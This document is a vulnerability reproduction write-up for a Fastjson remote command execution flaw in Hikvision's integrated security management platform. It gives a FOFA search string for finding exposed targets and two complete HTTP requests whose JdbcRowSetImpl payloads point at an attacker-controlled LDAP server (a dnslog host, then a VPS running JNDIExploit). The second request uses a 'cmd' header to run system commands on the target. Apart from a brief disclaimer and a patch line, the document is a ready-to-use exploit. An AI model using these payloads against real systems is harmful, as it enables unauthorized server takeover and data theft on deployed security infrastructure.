Article Directory
foreword
Hikvision’s comprehensive security management platform has a Fastjson remote command execution vulnerability. Attackers can construct malicious Payloads to execute and obtain server system permissions and sensitive data information.
statement
This article is only used for vulnerability reproduction and technical research. Do not use the attack methods involved in the article for unauthorized penetration attacks. Any consequences caused have nothing to do with this article and the author, remember! ! !
1. Brief Introduction of Hikvision Integrated Security Management Platform
The comprehensive security management platform is designed based on the concept of "unified software technology architecture" and adopts business component technology to meet the elastic expansion of the platform in terms of business. The platform is applicable to the general comprehensive security business of the whole industry. It integrates and centrally manages the resources of each system, and realizes unified deployment, configuration, management and scheduling.
2. Vulnerability description
Hikvision’s comprehensive security management platform has a Fastjson remote command execution vulnerability, which can execute system commands and obtain system permissions and sensitive data information of the target server.
Three, the impact version
unknown
4. Vulnerability recurrence
FOFA: app=“HIKVISION-Comprehensive Security Management Platform”
vulnerability data package is as follows:
POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 196
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnslog.cn","autoCommit":true},"hfe4zyyzldp":"="}
First of all, test whether the dnslog can be echoed when ldap is executed. If the request can be received, there is a high probability that there is a command execution vulnerability.
After confirming that dnslog can receive the request, it can be further exploited. Use the JNDIExploit-1.3-SNAPSHOT.jar tool to execute the following command
Tool download address: go to download
java -jar JNDIExploit-1.3-SNAPSHOT.jar -i VPSip
Then add fields to the header of Burp’s request packet. cmd: whoamiHere cmd can execute system commands. In the payload below, change ldap to your VPSip/Basic/TomcatEcho, as follows:
POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: keep-alive
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
cmd: whoami
Content-Length: 215
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://公网服务器ip地址:1389/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}
Burp puts the package and executes
the command execution successfully! ! !
5. Repair plan
At present, the manufacturer provides repair patches, please go to the official website to download the corresponding version patches.